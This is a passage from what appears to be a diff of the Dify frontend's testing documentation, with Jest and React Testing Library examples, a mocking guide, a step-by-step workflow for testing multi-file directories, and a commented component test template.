const node = createMockNode({ type: 'llm' })
render(<NodeConfigPanel node={node} />)
await user.selectOptions(screen.getByLabelText(/model/i), 'gpt-4')
expect(mockWorkflowStore.updateNode).toHaveBeenCalledWith(
node.id,
expect.objectContaining({ model: 'gpt-4' })
)
})
})
describe('Data Validation', () => {
it('should show error for invalid input', async () => {
const user = userEvent.setup()
const node = createMockNode({ type: 'code' })
render(<NodeConfigPanel node={node} />)
// Enter invalid code
const codeInput = screen.getByLabelText(/code/i)
await user.clear(codeInput)
await user.type(codeInput, 'invalid syntax {{{')
await waitFor(() => {
expect(screen.getByText(/syntax error/i)).toBeInTheDocument()
})
})
it('should validate required fields', async () => {
const node = createMockNode({ type: 'http', data: { url: '' } })
render(<NodeConfigPanel node={node} />)
fireEvent.click(screen.getByRole('button', { name: /save/i }))
await waitFor(() => {
expect(screen.getByText(/url is required/i)).toBeInTheDocument()
})
})
})
describe('Variable Passing', () => {
it('should display available variables from upstream nodes', () => {
const upstreamNode = createMockNode({
id: 'node-1',
type: 'start',
data: { outputs: [{ name: 'user_input', type: 'string' }] },
})
const currentNode = createMockNode({
id: 'node-2',
type: 'llm',
})
mockWorkflowStore.nodes = [upstreamNode, currentNode]
mockWorkflowStore.edges = [{ source: 'node-1', target: 'node-2' }]
render(<NodeConfigPanel node={currentNode} />)
// Variable selector should show upstream variables
fireEvent.click(screen.getByRole('button', { name: /add variable/i }))
expect(screen.getByText('user_input')).toBeInTheDocument()
})
it('should insert variable into prompt template', async () => {
const user = userEvent.setup()
const node = createMockNode({ type: 'llm' })
render(<NodeConfigPanel node={node} />)
// Click variable button
await user.click(screen.getByRole('button', { name: /insert variable/i }))
await user.click(screen.getByText('user_input'))
const promptInput = screen.getByLabelText(/prompt/i)
expect(promptInput).toHaveValue(expect.stringContaining('{{user_input}}'))
})
})
})
```
## Dataset Components (`dataset/`)
Dataset components handle file uploads, data display, and search/filter operations.
### Key Test Areas
1. **File Upload**
1. **File Type Validation**
1. **Pagination**
1. **Search & Filtering**
1. **Data Format Handling**
### Example: Document Uploader
```typescript
import { render, screen, fireEvent, waitFor } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import DocumentUploader from './document-uploader'
jest.mock('@/service/datasets', () => ({
uploadDocument: jest.fn(),
parseDocument: jest.fn(),
}))
import * as datasetService from '@/service/datasets'
const mockedService = datasetService as jest.Mocked<typeof datasetService>
describe('DocumentUploader', () => {
beforeEach(() => {
jest.clearAllMocks()
})
describe('File Upload', () => {
it('should accept valid file types', async () => {
const user = userEvent.setup()
const onUpload = jest.fn()
mockedService.uploadDocument.mockResolvedValue({ id: 'doc-1' })
render(<DocumentUploader onUpload={onUpload} />)
const file = new File(['content'], 'test.pdf', { type: 'application/pdf' })
const input = screen.getByLabelText(/upload/i)
await user.upload(input, file)
await waitFor(() => {
expect(mockedService.uploadDocument).toHaveBeenCalledWith(
expect.any(FormData)
)
})
})
it('should reject invalid file types', async () => {
const user = userEvent.setup()
render(<DocumentUploader />)
const file = new File(['content'], 'test.exe', { type: 'application/x-msdownload' })
const input = screen.getByLabelText(/upload/i)
await user.upload(input, file)
expect(screen.getByText(/unsupported file type/i)).toBeInTheDocument()
expect(mockedService.uploadDocument).not.toHaveBeenCalled()
})
it('should show upload progress', async () => {
const user = userEvent.setup()
// Mock upload with progress
mockedService.uploadDocument.mockImplementation(() => {
return new Promise((resolve) => {
setTimeout(() => resolve({ id: 'doc-1' }), 100)
})
})
render(<DocumentUploader />)
const file = new File(['content'], 'test.pdf', { type: 'application/pdf' })
await user.upload(screen.getByLabelText(/upload/i), file)
expect(screen.getByRole('progressbar')).toBeInTheDocument()
await waitFor(() => {
expect(screen.queryByRole('progressbar')).not.toBeInTheDocument()
})
})
})
describe('Error Handling', () => {
it('should handle upload failure', async () => {
const user = userEvent.setup()
mockedService.uploadDocument.mockRejectedValue(new Error('Upload failed'))
render(<DocumentUploader />)
const file = new File(['content'], 'test.pdf', { type: 'application/pdf' })
await user.upload(screen.getByLabelText(/upload/i), file)
await waitFor(() => {
expect(screen.getByText(/upload failed/i)).toBeInTheDocument()
})
})
it('should allow retry after failure', async () => {
const user = userEvent.setup()
mockedService.uploadDocument
.mockRejectedValueOnce(new Error('Network error'))
.mockResolvedValueOnce({ id: 'doc-1' })
render(<DocumentUploader />)
const file = new File(['content'], 'test.pdf', { type: 'application/pdf' })
await user.upload(screen.getByLabelText(/upload/i), file)
await waitFor(() => {
expect(screen.getByRole('button', { name: /retry/i })).toBeInTheDocument()
})
await user.click(screen.getByRole('button', { name: /retry/i }))
await waitFor(() => {
expect(screen.getByText(/uploaded successfully/i)).toBeInTheDocument()
})
})
})
})
```
### Example: Document List with Pagination
```typescript
describe('DocumentList', () => {
describe('Pagination', () => {
it('should load first page on mount', async () => {
mockedService.getDocuments.mockResolvedValue({
data: [{ id: '1', name: 'Doc 1' }],
total: 50,
page: 1,
pageSize: 10,
})
render(<DocumentList datasetId="ds-1" />)
await waitFor(() => {
expect(screen.getByText('Doc 1')).toBeInTheDocument()
})
expect(mockedService.getDocuments).toHaveBeenCalledWith('ds-1', { page: 1 })
})
it('should navigate to next page', async () => {
const user = userEvent.setup()
mockedService.getDocuments.mockResolvedValue({
data: [{ id: '1', name: 'Doc 1' }],
total: 50,
page: 1,
pageSize: 10,
})
render(<DocumentList datasetId="ds-1" />)
await waitFor(() => {
expect(screen.getByText('Doc 1')).toBeInTheDocument()
})
mockedService.getDocuments.mockResolvedValue({
data: [{ id: '11', name: 'Doc 11' }],
total: 50,
page: 2,
pageSize: 10,
})
await user.click(screen.getByRole('button', { name: /next/i }))
await waitFor(() => {
expect(screen.getByText('Doc 11')).toBeInTheDocument()
})
})
})
describe('Search & Filtering', () => {
it('should filter by search query', async () => {
const user = userEvent.setup()
jest.useFakeTimers()
render(<DocumentList datasetId="ds-1" />)
await user.type(screen.getByPlaceholderText(/search/i), 'test query')
// Debounce
jest.advanceTimersByTime(300)
await waitFor(() => {
expect(mockedService.getDocuments).toHaveBeenCalledWith(
'ds-1',
expect.objectContaining({ search: 'test query' })
)
})
jest.useRealTimers()
})
})
})
```
## Configuration Components (`app/configuration/`, `config/`)
Configuration components handle forms, validation, and data persistence.
### Key Test Areas
1. **Form Validation**
1. **Save/Reset**
1. **Required vs Optional Fields**
1. **Configuration Persistence**
1. **Error Feedback**
### Example: App Configuration Form
```typescript
import { render, screen, fireEvent, waitFor } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import AppConfigForm from './app-config-form'
jest.mock('@/service/apps', () => ({
updateAppConfig: jest.fn(),
getAppConfig: jest.fn(),
}))
import * as appService from '@/service/apps'
const mockedService = appService as jest.Mocked<typeof appService>
describe('AppConfigForm', () => {
const defaultConfig = {
name: 'My App',
description: '',
icon: 'default',
openingStatement: '',
}
beforeEach(() => {
jest.clearAllMocks()
mockedService.getAppConfig.mockResolvedValue(defaultConfig)
})
describe('Form Validation', () => {
it('should require app name', async () => {
const user = userEvent.setup()
render(<AppConfigForm appId="app-1" />)
await waitFor(() => {
expect(screen.getByLabelText(/name/i)).toHaveValue('My App')
})
// Clear name field
await user.clear(screen.getByLabelText(/name/i))
await user.click(screen.getByRole('button', { name: /save/i }))
expect(screen.getByText(/name is required/i)).toBeInTheDocument()
expect(mockedService.updateAppConfig).not.toHaveBeenCalled()
})
it('should validate name length', async () => {
const user = userEvent.setup()
render(<AppConfigForm appId="app-1" />)
await waitFor(() => {
expect(screen.getByLabelText(/name/i)).toBeInTheDocument()
})
// Enter very long name
await user.clear(screen.getByLabelText(/name/i))
await user.type(screen.getByLabelText(/name/i), 'a'.repeat(101))
expect(screen.getByText(/name must be less than 100 characters/i)).toBeInTheDocument()
})
it('should allow empty optional fields', async () => {
const user = userEvent.setup()
mockedService.updateAppConfig.mockResolvedValue({ success: true })
render(<AppConfigForm appId="app-1" />)
await waitFor(() => {
expect(screen.getByLabelText(/name/i)).toHaveValue('My App')
})
// Leave description empty (optional)
await user.click(screen.getByRole('button', { name: /save/i }))
await waitFor(() => {
expect(mockedService.updateAppConfig).toHaveBeenCalled()
})
})
})
describe('Save/Reset Functionality', () => {
it('should save configuration', async () => {
const user = userEvent.setup()
mockedService.updateAppConfig.mockResolvedValue({ success: true })
render(<AppConfigForm appId="app-1" />)
await waitFor(() => {
expect(screen.getByLabelText(/name/i)).toHaveValue('My App')
})
await user.clear(screen.getByLabelText(/name/i))
await user.type(screen.getByLabelText(/name/i), 'Updated App')
await user.click(screen.getByRole('button', { name: /save/i }))
await waitFor(() => {
expect(mockedService.updateAppConfig).toHaveBeenCalledWith(
'app-1',
expect.objectContaining({ name: 'Updated App' })
)
})
expect(screen.getByText(/saved successfully/i)).toBeInTheDocument()
})
it('should reset to default values', async () => {
const user = userEvent.setup()
render(<AppConfigForm appId="app-1" />)
await waitFor(() => {
expect(screen.getByLabelText(/name/i)).toHaveValue('My App')
})
// Make changes
await user.clear(screen.getByLabelText(/name/i))
await user.type(screen.getByLabelText(/name/i), 'Changed Name')
// Reset
await user.click(screen.getByRole('button', { name: /reset/i }))
expect(screen.getByLabelText(/name/i)).toHaveValue('My App')
})
it('should show unsaved changes warning', async () => {
const user = userEvent.setup()
render(<AppConfigForm appId="app-1" />)
await waitFor(() => {
expect(screen.getByLabelText(/name/i)).toHaveValue('My App')
})
// Make changes
await user.type(screen.getByLabelText(/name/i), ' Updated')
expect(screen.getByText(/unsaved changes/i)).toBeInTheDocument()
})
})
describe('Error Handling', () => {
it('should show error on save failure', async () => {
const user = userEvent.setup()
mockedService.updateAppConfig.mockRejectedValue(new Error('Server error'))
render(<AppConfigForm appId="app-1" />)
await waitFor(() => {
expect(screen.getByLabelText(/name/i)).toHaveValue('My App')
})
await user.click(screen.getByRole('button', { name: /save/i }))
await waitFor(() => {
expect(screen.getByText(/failed to save/i)).toBeInTheDocument()
})
})
})
})
```

View File

@ -0,0 +1,353 @@
# Mocking Guide for Dify Frontend Tests
## ⚠️ Important: What NOT to Mock
### DO NOT Mock Base Components
**Never mock components from `@/app/components/base/`** such as:
- `Loading`, `Spinner`
- `Button`, `Input`, `Select`
- `Tooltip`, `Modal`, `Dropdown`
- `Icon`, `Badge`, `Tag`
**Why?**
- Base components will have their own dedicated tests
- Mocking them creates false positives (tests pass but real integration fails)
- Using real components tests actual integration behavior
```typescript
// ❌ WRONG: Don't mock base components
jest.mock('@/app/components/base/loading', () => () => <div>Loading</div>)
jest.mock('@/app/components/base/button', () => ({ children }: any) => <button>{children}</button>)
// ✅ CORRECT: Import and use real base components
import Loading from '@/app/components/base/loading'
import Button from '@/app/components/base/button'
// They will render normally in tests
```
### What TO Mock
Only mock these categories:
1. **API services** (`@/service/*`) - Network calls
1. **Complex context providers** - When setup is too difficult
1. **Third-party libraries with side effects** - `next/navigation`, external SDKs
1. **i18n** - Always mock to return keys
## Mock Placement
| Location | Purpose |
|----------|---------|
| `web/__mocks__/` | Reusable mocks shared across multiple test files |
| Test file | Test-specific mocks, inline with `jest.mock()` |
## Essential Mocks
### 1. i18n (Always Required)
```typescript
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
```
### 2. Next.js Router
```typescript
const mockPush = jest.fn()
const mockReplace = jest.fn()
jest.mock('next/navigation', () => ({
useRouter: () => ({
push: mockPush,
replace: mockReplace,
back: jest.fn(),
prefetch: jest.fn(),
}),
usePathname: () => '/current-path',
useSearchParams: () => new URLSearchParams('?key=value'),
}))
describe('Component', () => {
beforeEach(() => {
jest.clearAllMocks()
})
it('should navigate on click', () => {
render(<Component />)
fireEvent.click(screen.getByRole('button'))
expect(mockPush).toHaveBeenCalledWith('/expected-path')
})
})
```
### 3. Portal Components (with Shared State)
```typescript
// ⚠️ Important: Use shared state for components that depend on each other
let mockPortalOpenState = false
jest.mock('@/app/components/base/portal-to-follow-elem', () => ({
PortalToFollowElem: ({ children, open, ...props }: any) => {
mockPortalOpenState = open || false // Update shared state
return <div data-testid="portal" data-open={open}>{children}</div>
},
PortalToFollowElemContent: ({ children }: any) => {
// ✅ Matches actual: returns null when portal is closed
if (!mockPortalOpenState) return null
return <div data-testid="portal-content">{children}</div>
},
PortalToFollowElemTrigger: ({ children }: any) => (
<div data-testid="portal-trigger">{children}</div>
),
}))
describe('Component', () => {
beforeEach(() => {
jest.clearAllMocks()
mockPortalOpenState = false // ✅ Reset shared state
})
})
```
### 4. API Service Mocks
```typescript
import * as api from '@/service/api'
jest.mock('@/service/api')
const mockedApi = api as jest.Mocked<typeof api>
describe('Component', () => {
beforeEach(() => {
jest.clearAllMocks()
// Setup default mock implementation
mockedApi.fetchData.mockResolvedValue({ data: [] })
})
it('should show data on success', async () => {
mockedApi.fetchData.mockResolvedValue({ data: [{ id: 1 }] })
render(<Component />)
await waitFor(() => {
expect(screen.getByText('1')).toBeInTheDocument()
})
})
it('should show error on failure', async () => {
mockedApi.fetchData.mockRejectedValue(new Error('Network error'))
render(<Component />)
await waitFor(() => {
expect(screen.getByText(/error/i)).toBeInTheDocument()
})
})
})
```
### 5. HTTP Mocking with Nock
```typescript
import nock from 'nock'
const GITHUB_HOST = 'https://api.github.com'
const GITHUB_PATH = '/repos/owner/repo'
const mockGithubApi = (status: number, body: Record<string, unknown>, delayMs = 0) => {
return nock(GITHUB_HOST)
.get(GITHUB_PATH)
.delay(delayMs)
.reply(status, body)
}
describe('GithubComponent', () => {
afterEach(() => {
nock.cleanAll()
})
it('should display repo info', async () => {
mockGithubApi(200, { name: 'dify', stars: 1000 })
render(<GithubComponent />)
await waitFor(() => {
expect(screen.getByText('dify')).toBeInTheDocument()
})
})
it('should handle API error', async () => {
mockGithubApi(500, { message: 'Server error' })
render(<GithubComponent />)
await waitFor(() => {
expect(screen.getByText(/error/i)).toBeInTheDocument()
})
})
})
```
### 6. Context Providers
```typescript
import { ProviderContext } from '@/context/provider-context'
import { createMockProviderContextValue, createMockPlan } from '@/__mocks__/provider-context'
describe('Component with Context', () => {
it('should render for free plan', () => {
const mockContext = createMockPlan('sandbox')
render(
<ProviderContext.Provider value={mockContext}>
<Component />
</ProviderContext.Provider>
)
expect(screen.getByText('Upgrade')).toBeInTheDocument()
})
it('should render for pro plan', () => {
const mockContext = createMockPlan('professional')
render(
<ProviderContext.Provider value={mockContext}>
<Component />
</ProviderContext.Provider>
)
expect(screen.queryByText('Upgrade')).not.toBeInTheDocument()
})
})
```
### 7. SWR / React Query
```typescript
// SWR
jest.mock('swr', () => ({
__esModule: true,
default: jest.fn(),
}))
import useSWR from 'swr'
const mockedUseSWR = useSWR as jest.Mock
describe('Component with SWR', () => {
it('should show loading state', () => {
mockedUseSWR.mockReturnValue({
data: undefined,
error: undefined,
isLoading: true,
})
render(<Component />)
expect(screen.getByText(/loading/i)).toBeInTheDocument()
})
})
// React Query
import { QueryClient, QueryClientProvider } from '@tanstack/react-query'
const createTestQueryClient = () => new QueryClient({
defaultOptions: {
queries: { retry: false },
mutations: { retry: false },
},
})
const renderWithQueryClient = (ui: React.ReactElement) => {
const queryClient = createTestQueryClient()
return render(
<QueryClientProvider client={queryClient}>
{ui}
</QueryClientProvider>
)
}
```
## Mock Best Practices
### ✅ DO
1. **Use real base components** - Import from `@/app/components/base/` directly
1. **Use real project components** - Prefer importing over mocking
1. **Reset mocks in `beforeEach`**, not `afterEach`
1. **Match actual component behavior** in mocks (when mocking is necessary)
1. **Use factory functions** for complex mock data
1. **Import actual types** for type safety
1. **Reset shared mock state** in `beforeEach`
### ❌ DON'T
1. **Don't mock base components** (`Loading`, `Button`, `Tooltip`, etc.)
1. Don't mock components you can import directly
1. Don't create overly simplified mocks that miss conditional logic
1. Don't forget to clean up nock after each test
1. Don't use `any` types in mocks without necessity
### Mock Decision Tree
```
Need to use a component in test?
├─ Is it from @/app/components/base/*?
│ └─ YES → Import real component, DO NOT mock
├─ Is it a project component?
│ └─ YES → Prefer importing real component
│ Only mock if setup is extremely complex
├─ Is it an API service (@/service/*)?
│ └─ YES → Mock it
├─ Is it a third-party lib with side effects?
│ └─ YES → Mock it (next/navigation, external SDKs)
└─ Is it i18n?
└─ YES → Mock to return keys
```
## Factory Function Pattern
```typescript
// __mocks__/data-factories.ts
import type { User, Project } from '@/types'
export const createMockUser = (overrides: Partial<User> = {}): User => ({
id: 'user-1',
name: 'Test User',
email: 'test@example.com',
role: 'member',
createdAt: new Date().toISOString(),
...overrides,
})
export const createMockProject = (overrides: Partial<Project> = {}): Project => ({
id: 'project-1',
name: 'Test Project',
description: 'A test project',
owner: createMockUser(),
members: [],
createdAt: new Date().toISOString(),
...overrides,
})
// Usage in tests
it('should display project owner', () => {
const project = createMockProject({
owner: createMockUser({ name: 'John Doe' }),
})
render(<ProjectCard project={project} />)
expect(screen.getByText('John Doe')).toBeInTheDocument()
})
```

View File

@ -0,0 +1,269 @@
# Testing Workflow Guide
This guide defines the workflow for generating tests, especially for complex components or directories with multiple files.
## Scope Clarification
This guide addresses **multi-file workflow** (how to process multiple test files). For coverage requirements within a single test file, see `web/testing/testing.md` § Coverage Goals.
| Scope | Rule |
|-------|------|
| **Single file** | Complete coverage in one generation (100% function, >95% branch) |
| **Multi-file directory** | Process one file at a time, verify each before proceeding |
## ⚠️ Critical Rule: Incremental Approach for Multi-File Testing
When testing a **directory with multiple files**, **NEVER generate all test files at once.** Use an incremental, verify-as-you-go approach.
### Why Incremental?
| Batch Approach (❌) | Incremental Approach (✅) |
|---------------------|---------------------------|
| Generate 5+ tests at once | Generate 1 test at a time |
| Run tests only at the end | Run test immediately after each file |
| Multiple failures compound | Single point of failure, easy to debug |
| Hard to identify root cause | Clear cause-effect relationship |
| Mock issues affect many files | Mock issues caught early |
| Messy git history | Clean, atomic commits possible |
## Single File Workflow
When testing a **single component, hook, or utility**:
```
1. Read source code completely
2. Run `pnpm analyze-component <path>` (if available)
3. Check complexity score and features detected
4. Write the test file
5. Run test: `pnpm test -- <file>.spec.tsx`
6. Fix any failures
7. Verify coverage meets goals (100% function, >95% branch)
```
## Directory/Multi-File Workflow (MUST FOLLOW)
When testing a **directory or multiple files**, follow this strict workflow:
### Step 1: Analyze and Plan
1. **List all files** that need tests in the directory
1. **Categorize by complexity**:
- 🟢 **Simple**: Utility functions, simple hooks, presentational components
- 🟡 **Medium**: Components with state, effects, or event handlers
- 🔴 **Complex**: Components with API calls, routing, or many dependencies
1. **Order by dependency**: Test dependencies before dependents
1. **Create a todo list** to track progress
### Step 2: Determine Processing Order
Process files in this recommended order:
```
1. Utility functions (simplest, no React)
2. Custom hooks (isolated logic)
3. Simple presentational components (few/no props)
4. Medium complexity components (state, effects)
5. Complex components (API, routing, many deps)
6. Container/index components (integration tests - last)
```
**Rationale**:
- Simpler files help establish mock patterns
- Hooks used by components should be tested first
- Integration tests (index files) depend on child components working
### Step 3: Process Each File Incrementally
**For EACH file in the ordered list:**
```
┌─────────────────────────────────────────────┐
│ 1. Write test file │
│ 2. Run: pnpm test -- <file>.spec.tsx │
│ 3. If FAIL → Fix immediately, re-run │
│ 4. If PASS → Mark complete in todo list │
│ 5. ONLY THEN proceed to next file │
└─────────────────────────────────────────────┘
```
**DO NOT proceed to the next file until the current one passes.**
### Step 4: Final Verification
After all individual tests pass:
```bash
# Run all tests in the directory together
pnpm test -- path/to/directory/
# Check coverage
pnpm test -- --coverage path/to/directory/
```
## Component Complexity Guidelines
Use `pnpm analyze-component <path>` to assess complexity before testing.
### 🔴 Very Complex Components (Complexity > 50)
**Consider refactoring BEFORE testing:**
- Break component into smaller, testable pieces
- Extract complex logic into custom hooks
- Separate container and presentational layers
**If testing as-is:**
- Use integration tests for complex workflows
- Use `test.each()` for data-driven testing
- Multiple `describe` blocks for organization
- Consider testing major sections separately
### 🟡 Medium Complexity (Complexity 30-50)
- Group related tests in `describe` blocks
- Test integration scenarios between internal parts
- Focus on state transitions and side effects
- Use helper functions to reduce test complexity
### 🟢 Simple Components (Complexity < 30)
- Standard test structure
- Focus on props, rendering, and edge cases
- Usually straightforward to test
### 📏 Large Files (500+ lines)
Regardless of complexity score:
- **Strongly consider refactoring** before testing
- If testing as-is, test major sections separately
- Create helper functions for test setup
- May need multiple test files
## Todo List Format
When testing multiple files, use a todo list like this:
```
Testing: path/to/directory/
Ordered by complexity (simple → complex):
☐ utils/helper.ts [utility, simple]
☐ hooks/use-custom-hook.ts [hook, simple]
☐ empty-state.tsx [component, simple]
☐ item-card.tsx [component, medium]
☐ list.tsx [component, complex]
☐ index.tsx [integration]
Progress: 0/6 complete
```
Update status as you complete each:
- ☐ → ⏳ (in progress)
- ⏳ → ✅ (complete and verified)
- ⏳ → ❌ (blocked, needs attention)
## When to Stop and Verify
**Always run tests after:**
- Completing a test file
- Making changes to fix a failure
- Modifying shared mocks
- Updating test utilities or helpers
**Signs you should pause:**
- More than 2 consecutive test failures
- Mock-related errors appearing
- Unclear why a test is failing
- Test passing but coverage unexpectedly low
## Common Pitfalls to Avoid
### ❌ Don't: Generate Everything First
```
# BAD: Writing all files then testing
Write component-a.spec.tsx
Write component-b.spec.tsx
Write component-c.spec.tsx
Write component-d.spec.tsx
Run pnpm test ← Multiple failures, hard to debug
```
### ✅ Do: Verify Each Step
```
# GOOD: Incremental with verification
Write component-a.spec.tsx
Run pnpm test -- component-a.spec.tsx ✅
Write component-b.spec.tsx
Run pnpm test -- component-b.spec.tsx ✅
...continue...
```
### ❌ Don't: Skip Verification for "Simple" Components
Even simple components can have:
- Import errors
- Missing mock setup
- Incorrect assumptions about props
**Always verify, regardless of perceived simplicity.**
### ❌ Don't: Continue When Tests Fail
Failing tests compound:
- A mock issue in file A affects files B, C, D
- Fixing A later requires revisiting all dependent tests
- Time wasted on debugging cascading failures
**Fix failures immediately before proceeding.**
## Integration with Claude's Todo Feature
When using Claude for multi-file testing:
1. **Ask Claude to create a todo list** before starting
1. **Request one file at a time** or ensure Claude processes incrementally
1. **Verify each test passes** before asking for the next
1. **Mark todos complete** as you progress
Example prompt:
```
Test all components in `path/to/directory/`.
First, analyze the directory and create a todo list ordered by complexity.
Then, process ONE file at a time, waiting for my confirmation that tests pass
before proceeding to the next.
```
## Summary Checklist
Before starting multi-file testing:
- [ ] Listed all files needing tests
- [ ] Ordered by complexity (simple → complex)
- [ ] Created todo list for tracking
- [ ] Understand dependencies between files
During testing:
- [ ] Processing ONE file at a time
- [ ] Running tests after EACH file
- [ ] Fixing failures BEFORE proceeding
- [ ] Updating todo list progress
After completion:
- [ ] All individual tests pass
- [ ] Full directory test run passes
- [ ] Coverage goals met
- [ ] Todo list shows all complete

View File

@ -0,0 +1,289 @@
/**
* Test Template for React Components
*
* WHY THIS STRUCTURE?
* - Organized sections make tests easy to navigate and maintain
* - Mocks at top ensure consistent test isolation
* - Factory functions reduce duplication and improve readability
* - describe blocks group related scenarios for better debugging
*
* INSTRUCTIONS:
* 1. Replace `ComponentName` with your component name
* 2. Update import path
* 3. Add/remove test sections based on component features (use analyze-component)
* 4. Follow AAA pattern: Arrange Act Assert
*
* RUN FIRST: pnpm analyze-component <path> to identify required test scenarios
*/
import { render, screen, fireEvent, waitFor } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
// import ComponentName from './index'
// ============================================================================
// Mocks
// ============================================================================
// WHY: Mocks must be hoisted to top of file (Jest requirement).
// They run BEFORE imports, so keep them before component imports.
// i18n (always required in Dify)
// WHY: Returns key instead of translation so tests don't depend on i18n files
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
// Router (if component uses useRouter, usePathname, useSearchParams)
// WHY: Isolates tests from Next.js routing, enables testing navigation behavior
// const mockPush = jest.fn()
// jest.mock('next/navigation', () => ({
// useRouter: () => ({ push: mockPush }),
// usePathname: () => '/test-path',
// }))
// API services (if component fetches data)
// WHY: Prevents real network calls, enables testing all states (loading/success/error)
// jest.mock('@/service/api')
// import * as api from '@/service/api'
// const mockedApi = api as jest.Mocked<typeof api>
// Shared mock state (for portal/dropdown components)
// WHY: Portal components like PortalToFollowElem need shared state between
// parent and child mocks to correctly simulate open/close behavior
// let mockOpenState = false
// ============================================================================
// Test Data Factories
// ============================================================================
// WHY FACTORIES?
// - Avoid hard-coded test data scattered across tests
// - Easy to create variations with overrides
// - Type-safe when using actual types from source
// - Single source of truth for default test values
// const createMockProps = (overrides = {}) => ({
// // Default props that make component render successfully
// ...overrides,
// })
// const createMockItem = (overrides = {}) => ({
// id: 'item-1',
// name: 'Test Item',
// ...overrides,
// })
// ============================================================================
// Test Helpers
// ============================================================================
// const renderComponent = (props = {}) => {
// return render(<ComponentName {...createMockProps(props)} />)
// }
// ============================================================================
// Tests
// ============================================================================
describe('ComponentName', () => {
// WHY beforeEach with clearAllMocks?
// - Ensures each test starts with clean slate
// - Prevents mock call history from leaking between tests
// - MUST be beforeEach (not afterEach) to reset BEFORE assertions like toHaveBeenCalledTimes
beforeEach(() => {
jest.clearAllMocks()
// Reset shared mock state if used (CRITICAL for portal/dropdown tests)
// mockOpenState = false
})
// --------------------------------------------------------------------------
// Rendering Tests (REQUIRED - Every component MUST have these)
// --------------------------------------------------------------------------
// WHY: Catches import errors, missing providers, and basic render issues
describe('Rendering', () => {
it('should render without crashing', () => {
// Arrange - Setup data and mocks
// const props = createMockProps()
// Act - Render the component
// render(<ComponentName {...props} />)
// Assert - Verify expected output
// Prefer getByRole for accessibility; it's what users "see"
// expect(screen.getByRole('...')).toBeInTheDocument()
})
it('should render with default props', () => {
// WHY: Verifies component works without optional props
// render(<ComponentName />)
// expect(screen.getByText('...')).toBeInTheDocument()
})
})
// --------------------------------------------------------------------------
// Props Tests (REQUIRED - Every component MUST test prop behavior)
// --------------------------------------------------------------------------
// WHY: Props are the component's API contract. Test them thoroughly.
describe('Props', () => {
it('should apply custom className', () => {
// WHY: Common pattern in Dify - components should merge custom classes
// render(<ComponentName className="custom-class" />)
// expect(screen.getByTestId('component')).toHaveClass('custom-class')
})
it('should use default values for optional props', () => {
// WHY: Verifies TypeScript defaults work at runtime
// render(<ComponentName />)
// expect(screen.getByRole('...')).toHaveAttribute('...', 'default-value')
})
})
// --------------------------------------------------------------------------
// User Interactions (if component has event handlers - on*, handle*)
// --------------------------------------------------------------------------
// WHY: Event handlers are core functionality. Test from user's perspective.
describe('User Interactions', () => {
it('should call onClick when clicked', async () => {
// WHY userEvent over fireEvent?
// - userEvent simulates real user behavior (focus, hover, then click)
// - fireEvent is lower-level, doesn't trigger all browser events
// const user = userEvent.setup()
// const handleClick = jest.fn()
// render(<ComponentName onClick={handleClick} />)
//
// await user.click(screen.getByRole('button'))
//
// expect(handleClick).toHaveBeenCalledTimes(1)
})
it('should call onChange when value changes', async () => {
// const user = userEvent.setup()
// const handleChange = jest.fn()
// render(<ComponentName onChange={handleChange} />)
//
// await user.type(screen.getByRole('textbox'), 'new value')
//
// expect(handleChange).toHaveBeenCalled()
})
})
// --------------------------------------------------------------------------
// State Management (if component uses useState/useReducer)
// --------------------------------------------------------------------------
// WHY: Test state through observable UI changes, not internal state values
describe('State Management', () => {
it('should update state on interaction', async () => {
// WHY test via UI, not state?
// - State is implementation detail; UI is what users see
// - If UI works correctly, state must be correct
// const user = userEvent.setup()
// render(<ComponentName />)
//
// // Initial state - verify what user sees
// expect(screen.getByText('Initial')).toBeInTheDocument()
//
// // Trigger state change via user action
// await user.click(screen.getByRole('button'))
//
// // New state - verify UI updated
// expect(screen.getByText('Updated')).toBeInTheDocument()
})
})
// --------------------------------------------------------------------------
// Async Operations (if component fetches data - useSWR, useQuery, fetch)
// --------------------------------------------------------------------------
// WHY: Async operations have 3 states users experience: loading, success, error
describe('Async Operations', () => {
it('should show loading state', () => {
// WHY never-resolving promise?
// - Keeps component in loading state for assertion
// - Alternative: use fake timers
// mockedApi.fetchData.mockImplementation(() => new Promise(() => {}))
// render(<ComponentName />)
//
// expect(screen.getByText(/loading/i)).toBeInTheDocument()
})
it('should show data on success', async () => {
// WHY waitFor?
// - Component updates asynchronously after fetch resolves
// - waitFor retries assertion until it passes or times out
// mockedApi.fetchData.mockResolvedValue({ items: ['Item 1'] })
// render(<ComponentName />)
//
// await waitFor(() => {
// expect(screen.getByText('Item 1')).toBeInTheDocument()
// })
})
it('should show error on failure', async () => {
// mockedApi.fetchData.mockRejectedValue(new Error('Network error'))
// render(<ComponentName />)
//
// await waitFor(() => {
// expect(screen.getByText(/error/i)).toBeInTheDocument()
// })
})
})
// --------------------------------------------------------------------------
// Edge Cases (REQUIRED - Every component MUST handle edge cases)
// --------------------------------------------------------------------------
// WHY: Real-world data is messy. Components must handle:
// - Null/undefined from API failures or optional fields
// - Empty arrays/strings from user clearing data
// - Boundary values (0, MAX_INT, special characters)
describe('Edge Cases', () => {
it('should handle null value', () => {
// WHY test null specifically?
// - API might return null for missing data
// - Prevents "Cannot read property of null" in production
// render(<ComponentName value={null} />)
// expect(screen.getByText(/no data/i)).toBeInTheDocument()
})
it('should handle undefined value', () => {
// WHY test undefined separately from null?
// - TypeScript treats them differently
// - Optional props are undefined, not null
// render(<ComponentName value={undefined} />)
// expect(screen.getByText(/no data/i)).toBeInTheDocument()
})
it('should handle empty array', () => {
// WHY: Empty state often needs special UI (e.g., "No items yet")
// render(<ComponentName items={[]} />)
// expect(screen.getByText(/empty/i)).toBeInTheDocument()
})
it('should handle empty string', () => {
// WHY: Empty strings are truthy in JS but visually empty
// render(<ComponentName text="" />)
// expect(screen.getByText(/placeholder/i)).toBeInTheDocument()
})
})
// --------------------------------------------------------------------------
// Accessibility (optional but recommended for Dify's enterprise users)
// --------------------------------------------------------------------------
// WHY: Dify has enterprise customers who may require accessibility compliance
describe('Accessibility', () => {
it('should have accessible name', () => {
// WHY getByRole with name?
// - Tests that screen readers can identify the element
// - Enforces proper labeling practices
// render(<ComponentName label="Test Label" />)
